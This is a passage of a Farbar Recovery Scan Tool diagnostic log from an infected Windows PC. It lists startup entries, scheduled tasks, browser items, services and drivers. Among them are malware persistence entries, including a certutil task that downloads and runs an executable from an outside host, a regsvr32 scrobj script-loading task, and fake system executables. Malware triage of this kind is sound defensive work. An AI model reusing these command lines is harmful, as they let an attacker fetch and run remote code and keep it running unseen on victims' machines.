(Xerox) [File not signed] C:\Program Files (x86)\Xerox Office Printing\Printer SSW2\PrintingScout\xrksmpl.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18378208 2017-05-31] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_ASC] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1489376 2017-05-31] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_CTPreset] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1489376 2017-05-31] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1489376 2017-05-31] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [PicstreamAgent] => C:\Program Files (x86)\Acer\AOP Framework\uwplauncher.exe [106712 2017-05-17] (Acer Incorporated -> )
HKLM\...\Run: [GLSystray] => C:\Program Files (x86)\GLPCCamera\monitorpad.exe [69632 2014-03-11] () [File not signed]
HKLM\...\Run: [DAX2_APP] => C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe [849928 2016-09-19] (Dolby Laboratories, Inc. -> )
HKLM-x32\...\Run: [Launcher6020] => C:\Program Files (x86)\Xerox Office Printing\Printer SSW2\Launcher\xrlaunch.exe [2619904 2014-05-05] (Xerox) [File not signed]
HKLM-x32\...\Run: [StatusAutoRun6020] => C:\Program Files (x86)\Xerox Office Printing\Printer SSW2\PrintingScout\xrksmpl.exe [4297728 2014-08-27] (Xerox) [File not signed]
HKLM\...\RunOnce: [4lmgurqpczt] => C:\Program Files (x86)\EatPizza\616386955.exe [678400 2019-06-10] () [File not signed]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [AcerPortal] => C:\ProgramData\acer\Acer Portal\launchPortal.exe [25816 2017-05-17] (Acer Incorporated -> )
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [Zoner Photo Studio Autoupdate] => C:\PROGRAM FILES\ZONER\PHOTO STUDIO 17\Program32\ZPSTRAY.EXE [437248 2014-09-12] (ZONER software, a.s. -> ZONER software)
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [App] => C:\Users\TATTOO NR\AppData\Local\App\svchost.exe [589824 2019-06-10] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [LingeringViolet] => C:\WINDOWS\rss\csrss.exe [5223936 2019-06-10] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [7018735] => C:\Users\TATTOO NR\AppData\Local\Temp\is-9H4DE.tmp\Boutixc.exe [3524063 2019-06-10] ( ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [0BIHA30U5ZHWRH1] => C:\Program Files\HIXKNY8VO4\HIXKNY8VO.exe [1050112 2019-06-10] (G%W6R6E3) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [9887864] => C:\Users\TATTOO NR\AppData\Roaming\4zvrrfvi3jw\xjmcc2x5pii.exe [2384286 2019-06-10] ( ) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [18630056 2018-09-11] (Piriform Ltd -> Piriform Ltd)
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [CloudNet] => C:\Users\TATTOO NR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-06-10] (EpicNet Inc.) [File not signed] <==== ATTENTION
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\ssText3d.scr [217088 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\74.0.3729.169\Installer\chrmstp.exe [2019-05-22] (Google LLC -> Google Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Mediatek Wireless Utility.lnk [2018-04-07]
ShortcutTarget: Mediatek Wireless Utility.lnk -> C:\Program Files (x86)\MediatekWiFi\Common\RaUI.exe (MEDIATEK INC. -> Mediatek Inc.) [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SOLIDWORKS 2018 Fast Start.lnk [2018-10-31]
ShortcutTarget: SOLIDWORKS 2018 Fast Start.lnk -> C:\Windows\Installer\{837A0B0D-F508-4088-8B05-606477DEB905}\NewShortcut2_87EDF6C81D0A4B7B84F42FE0C6A9D608.exe (Flexera Software LLC) [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SOLIDWORKS Background Downloader.lnk [2018-10-31]
ShortcutTarget: SOLIDWORKS Background Downloader.lnk -> C:\Program Files (x86)\Common Files\SOLIDWORKS Installation Manager\BackgroundDownloading\sldBgDwld.exe (Dassault Systemes SolidWorks Corp. -> Dassault Systèmes SolidWorks Corp.)
GroupPolicy: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0B130924-726B-4296-A8FC-43DD32223C9A} - System32\Tasks\Norton Security\Norton Security Error Processor => C:\Program Files\Norton Security\Engine\22.17.2.46\SymErr.exe [101392 2019-05-25] (Symantec Corporation -> Symantec Corporation)
Task: {0E0097EF-84E2-46AA-9798-CEAC4822F2BD} - System32\Tasks\ACC => C:\Program Files (x86)\Acer\Care Center\LiveUpdateChecker.exe [2920752 2017-02-21] (Acer Incorporated -> )
Task: {212D53B5-43BE-4AF6-9664-B699D3243DBD} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [26165840 2019-05-29] (Microsoft Corporation -> Microsoft Corporation)
Task: {23D87F40-A962-403E-8586-50FF5557A2B2} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2019-02-05] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {3DB190F6-28CB-4ED2-8F11-531A1CF35DC1} - System32\Tasks\Acer Collection Application => C:\Program Files (x86)\Acer\Acer Collection\ACEStd.exe [479024 2017-05-05] (Acer Incorporated -> )
Task: {4460186B-AF17-4DB3-AEAE-3CA9FE311778} - System32\Tasks\AcerCloud => C:\ProgramData\acer\Acer Portal\launchPortal.exe [25816 2017-05-17] (Acer Incorporated -> )
Task: {66741AAF-1ED2-4EB5-843D-DA5D9EED2041} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [52104 2017-05-25] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {716CF578-7C14-401E-8B7B-DAD60658B36B} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://nevernews.club/app/app.exe C:\Users\TATTOO NR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\TATTOO NR\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {76578927-BFDD-4A33-9148-A60E3E3BD0A2} - System32\Tasks\UbtFrameworkService => C:\Program Files\Acer\User Experience Improvement Program\Framework\TriggerFramework.exe [215856 2017-04-27] (Acer Incorporated -> TODO: <Company name>)
Task: {7A11DB60-7A74-4FD0-AAA7-B78395E6B0BF} - System32\Tasks\Acer Collection Monitor Application => C:\Program Files (x86)\Acer\Acer Collection\ACEMon.exe [417072 2017-03-09] (Acer Incorporated -> Acer Incorporated)
Task: {7A8AAB71-2022-4B97-BAD3-0F4BDE6BE93F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2017-12-08] (Google Inc -> Google Inc.)
Task: {84C41F00-2908-4441-80D0-C4A436588D1D} - System32\Tasks\AcerCMUpdateTask2.1.16258 => C:\Program Files (x86)\Acer\Amundsen\2.1.16258\AWC.exe [152880 2016-09-20] (Acer Incorporated -> )
Task: {88922F55-054D-481C-A0F4-E8FDE5EB7BE1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2017-12-08] (Google Inc -> Google Inc.)
Task: {8EF85D46-A2F7-43C4-88AE-6B4E3BE7E5AF} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\sdxhelper.exe [113096 2019-06-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {8FD2EF20-E0F9-400D-9A92-5E54F7872E30} - System32\Tasks\DashlaneUpgradeCheck => net [Argument = start "Dashlane Upgrade Service"]
Task: {8FF4B7EA-7A91-4108-A480-F2B83AA24164} - System32\Tasks\Quick Access => C:\Program Files\Acer\Acer Quick Access\QALauncher.exe [445744 2017-02-15] (Acer Incorporated -> Acer Incorporated)
Task: {94A860F6-81A9-4DB1-91E2-7B1386971ED5} - System32\Tasks\Software Update Application => C:\ProgramData\OEM\UpgradeTool\ListCheck.exe [473904 2017-02-15] (Acer Incorporated -> Acer Incorporated)
Task: {9D771D5C-3991-4681-A3C1-8CFCC7217DE5} - System32\Tasks\Norton Security\Norton Security Autofix => C:\Program Files\Norton Security\Engine\22.17.2.46\SymErr.exe [101392 2019-05-25] (Symantec Corporation -> Symantec Corporation)
Task: {AACE4BD4-3138-4CC1-B831-66413EC747D8} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton Security\Upgrade.exe
Task: {BB5CC8E5-BE39-4FB7-A350-2B30DC3C0034} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\sdxhelper.exe [113096 2019-06-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {C7B89D3D-FA1D-43E1-B830-B08E1A4567F8} - System32\Tasks\ACCBackgroundApplication => C:\Program Files (x86)\Acer\Care Center\ACCStd.exe [4645168 2017-02-21] (Acer Incorporated -> )
Task: {C84E55ED-A461-4885-8BC5-799BE0C811EB} - System32\Tasks\NvNgxUpdateCheckDaily_{A6B397E0-97E0-97E0-97E0-A6B397E097E0} => regsvr32 /s /n /u /i:"C:\Users\TATTOO NR\AppData\Roaming\arcuafh" scrobj
Task: {CB61EE22-FD30-4FC2-8835-162B610AF227} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1448064 2019-06-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {CD205B13-8D32-484A-BEBD-62B65E110D89} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [5223936 2019-06-10] () [File not signed] <==== ATTENTION
Task: {CDF6DC74-9111-4BEF-89A7-DA0934245E67} - System32\Tasks\Power Button => C:\Program Files\Acer\Acer Quick Access\ePowerButton_NB.exe [2767664 2017-02-15] (Acer Incorporated -> Acer Incorporated)
Task: {CEE5BB38-E1C1-4804-BC57-511F2829C8EC} - System32\Tasks\User Boot Experience Task => C:\OEM\Preload\FUBService\FUBService.exe [30976 2015-05-14] (Acer Incorporated -> )
Task: {D2F288FC-78B4-47F2-A75B-D1EFCD08D4D8} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1448064 2019-06-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {D483F23E-3002-45DA-9FE8-D1672B7338B6} - System32\Tasks\ACCAgent => C:\Program Files (x86)\Acer\Care Center\LiveUpdateAgent.exe [41264 2017-02-21] (Acer Incorporated -> )
Task: {D8BC792D-F8F0-45C3-8C12-B69CBE9BCE07} - System32\Tasks\Norton WSC Integration => C:\Program Files\Norton Security\Engine\22.17.2.46\WSCStub.exe [2225296 2019-05-25] (Symantec Corporation -> Symantec Corporation)
Task: {DECF662C-6ACD-4847-9773-F16675DEAA62} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [13797712 2018-09-11] (Piriform Ltd -> Piriform Ltd)
Task: {DFE346EB-B71E-4E21-8CA3-7256C573FD16} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [26165840 2019-05-29] (Microsoft Corporation -> Microsoft Corporation)
Task: {EF9C1632-7A77-4C89-83BE-104934848542} - System32\Tasks\Norton Security\Norton Security Error Analyzer => C:\Program Files\Norton Security\Engine\22.17.2.46\SymErr.exe [101392 2019-05-25] (Symantec Corporation -> Symantec Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.8.1 192.168.8.1
Tcpip\..\Interfaces\{2332afe5-1941-4ccb-81a8-cca5a88047e1}: [DhcpNameServer] 192.168.8.1 192.168.8.1
Tcpip\..\Interfaces\{401326d8-26c0-493a-a63e-bad398a973d8}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{fbf40bdb-b543-4dc1-8239-c1a24d677136}: [DhcpNameServer] 192.168.10.1

Internet Explorer:
==================
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://acer17win10.msn.com/?pc=ACTE
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer17win10.msn.com/?pc=ACTE
SearchScopes: HKU\S-1-5-21-1314756099-2751335980-7412341-1001 -> DefaultScope {509C9FF2-F2FF-4176-9A16-1D036D6A1AF4} URL =
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2019-06-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-06-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-06-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-06-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-06-02] (Microsoft Corporation -> Microsoft Corporation)

FireFox:
========
FF DefaultProfile: twf7p78h.default
FF ProfilePath: C:\Users\TATTOO NR\AppData\Roaming\Mozilla\Firefox\Profiles\twf7p78h.default [2019-06-10]
FF Extension: (English (US) Language Pack) - C:\Users\TATTOO NR\AppData\Roaming\Mozilla\Firefox\Profiles\twf7p78h.default\Extensions\langpack-en-US@firefox.mozilla.org.xpi [2018-12-20]
FF Extension: (Mozilla Partner Defaults) - C:\Users\TATTOO NR\AppData\Roaming\Mozilla\Firefox\Profiles\twf7p78h.default\Extensions\partnerdefaults@mozilla.com [2017-12-08] [Legacy]
FF Extension: (Acer Locale Fix) - C:\Users\TATTOO NR\AppData\Roaming\Mozilla\Firefox\Profiles\twf7p78h.default\features\{18ef1d82-648c-481c-9590-2660f6a75788}\acer-locale-fix@mozilla.org.xpi [2018-12-20] [Legacy]
FF Extension: (English (US) Language Pack) - C:\Program Files (x86)\Mozilla Firefox\distribution\extensions\langpack-en-US@firefox.mozilla.org [2017-12-09] [Legacy]
FF Extension: (Mozilla Partner Defaults) - C:\Program Files (x86)\Mozilla Firefox\distribution\extensions\partnerdefaults@mozilla.com [2017-12-09] [Legacy]
FF Plugin: 3ds.com/ComposerPlayerWebPlugin_x86_64 -> C:\PROGRA~1\SOLIDW~1\SOLIDW~3\Bin\NPCOMP~1.DLL [2018-02-26] (Dassault Systemes SE -> Dassault Systemes)
FF Plugin-x32: 3ds.com/ComposerPlayerWebPlugin -> C:\PROGRA~1\SOLIDW~1\SOLIDW~3\Bin\x86\NPCOMP~1.DLL [2018-02-26] (Dassault Systemes SE -> Dassault Systemes)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2019-04-08] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)

Chrome:
=======
CHR DefaultProfile: Profile 1
CHR Profile: C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default [2019-06-10]
CHR Extension: (Slides) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-12-08]
CHR Extension: (Docs) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-12-08]
CHR Extension: (Google Drive) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-12-08]
CHR Extension: (YouTube) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-12-08]
CHR Extension: (Norton Security Toolbar) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2019-03-11]
CHR Extension: (Sheets) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-12-08]
CHR Extension: (Google Docs Offline) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-23]
CHR Extension: (Norton Identity Safe) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2017-12-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-04-03]
CHR Extension: (Gmail) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-12-08]
CHR Extension: (Chrome Media Router) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-03-11]
CHR Profile: C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Guest Profile [2019-06-10]
CHR Profile: C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-06-10]
CHR Extension: (Slides) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-11-12]
CHR Extension: (Docs) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-11-12]
CHR Extension: (Google Drive) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-11-12]
CHR Extension: (YouTube) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-11-12]
CHR Extension: (Norton Security Toolbar) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2019-04-12]
CHR Extension: (Sheets) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-11-12]
CHR Extension: (Google Docs Offline) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-11-12]
CHR Extension: (Chrome Web Store Payments) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-11-12]
CHR Extension: (Gmail) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-08]
CHR Extension: (Chrome Media Router) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-05-24]
CHR Profile: C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\System Profile [2019-06-10]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton Security\Engine\22.17.2.46\Exts\Chrome.crx <not found>
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton Security\Engine\22.17.2.46\Exts\Chrome.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

"tijmjrmm" => service was unlocked. <==== ATTENTION

R2 AMD External Events Utility; C:\WINDOWS\system32\atiesrxx.exe [551800 2017-05-31] (Advanced Micro Devices, Inc. -> AMD)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [338312 2017-04-24] (Qualcomm Atheros -> Windows (R) Win 7 DDK provider)
R2 CCDMonitorService; C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe [2272472 2017-05-17] (Acer Incorporated -> Acer Incorporated)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11145800 2019-05-29] (Microsoft Corporation -> Microsoft Corporation)
S2 Dashlane Upgrade Service; C:\Program Files (x86)\Dashlane\Upgrade\DashlaneUpgradeService.exe [83992 2017-08-23] (Dashlane -> Dashlane, Inc.)
R2 Dolby DAX2 API Service; C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe [194048 2017-04-10] (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.)
S3 impi_hydra; C:\Program Files\Common Files\SolidWorks Shared\Simulation Worker Agent\hydra_service.exe [880296 2018-02-26] (Intel(R) Software Development Products -> Intel Corporation)
R2 MediatekRegistryWriter; C:\Program Files (x86)\MediatekWiFi\Common\RaRegistry.exe [401040 2014-07-31] (MEDIATEK INC. -> Mediatek Inc.)
R2 MediatekRegistryWriter64; C:\Program Files (x86)\MediatekWiFi\Common\RaRegistry64.exe [454288 2014-07-31] (MEDIATEK INC. -> Mediatek Inc.)
R2 NortonSecurity; C:\Program Files\Norton Security\Engine\22.17.2.46\NortonSecurity.exe [225608 2019-05-25] (Symantec Corporation -> Symantec Corporation)
R2 nsWscSvc; C:\Program Files\Norton Security\Engine\22.17.2.46\nsWscSvc.exe [933200 2019-05-25] (Symantec Corporation -> Symantec Corporation)
S3 QALSvc; C:\Program Files\Acer\Acer Quick Access\QALSvc.exe [461616 2017-02-15] (Acer Incorporated -> Acer Incorporated)
S3 QASvc; C:\Program Files\Acer\Acer Quick Access\QASvc.exe [506672 2017-02-15] (Acer Incorporated -> Acer Incorporated)
S3 RaMediaServer; C:\Program Files (x86)\MediatekWiFi\Common\RaMediaServer.exe [1863680 2012-07-06] (Ralink) [File not signed]
R2 RemoteSolverDispatcher; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe [264704 2018-02-26] (Mentor Graphics Corporation -> Mentor Graphics Corporation)
R2 RepetierServer; C:\Program Files (x86)\Repetier-Server\bin\RepetierServer.exe [7067496 2018-09-18] (Hot-World GmbH & Co. KG -> )
S3 SolidWorks Licensing Service; C:\Program Files (x86)\Common Files\SolidWorks Shared\Service\SolidWorksLicensing.exe [79360 2018-10-31] (SolidWorks) [File not signed]
S2 SWVisualize2018.BoostService; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize Boost\SWVisualize.BoostService.exe [59280 2018-02-26] (Dassault Systemes SolidWorks Corp. -> Dassault Systèmes)
S2 SWVisualize2018.Queue.Server; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe [24976 2018-02-26] (Dassault Systemes SolidWorks Corp. -> Dassault Systèmes)
S2 tijmjrmm; C:\WINDOWS\SysWOW64\tijmjrmm\mcibckaj.exe [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
S3 UEIPSvc; C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe [299824 2017-04-28] (Acer Incorporated -> acer)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [4413440 2019-03-14] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [107160 2019-02-16] (Microsoft Corporation -> Microsoft Corporation)
R2 WinDefender; C:\WINDOWS\windefender.exe [1435136 2019-06-10] (Access Denied) [File not signed]
R2 XRNADB2; C:\Program Files (x86)\Xerox Office Printing\Printer SSW2\PrintingScout\xrksmdb.exe [249344 2014-08-27] (Xerox) [File not signed]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 amdgpio2; C:\WINDOWS\System32\drivers\amdgpio2.sys [34704 2016-08-13] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc)
R3 amdi2c; C:\WINDOWS\System32\drivers\amdi2c.sys [54128 2017-05-11] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc)
S3 amdkmcsp; C:\WINDOWS\system32\DRIVERS\amdkmcsp.sys [101232 2017-06-16] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc. )
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0314721.inf_amd64_6e18cebcd5509182\atikmdag.sys [36557176 2017-05-31] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0314721.inf_amd64_6e18cebcd5509182\atikmpag.sys [528760 2017-05-31] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R0 amdpsp; C:\WINDOWS\System32\DRIVERS\amdpsp.sys [243048 2017-06-16] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc. )
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-04-25] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices)
S1 BHDrvx64; C:\Program Files\Norton Security\NortonData\22.9.2.3\Definitions\BASHDefs\20180201.001\BHDrvx64.sys [1880144 2018-01-23] (Symantec Corporation -> Symantec Corporation)
R1 ccSet_NGC; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\ccSetx64.sys [192704 2019-05-25] (Symantec Corporation -> Symantec Corporation)
S3 CH341SER_A64; C:\WINDOWS\System32\Drivers\CH341S64.SYS [59904 2015-02-06] (Microsoft Windows Hardware Compatibility Publisher -> www.winchiphead.com)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [507984 2018-01-04] (Symantec Corporation -> Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [152656 2018-01-04] (Symantec Corporation -> Symantec Corporation)
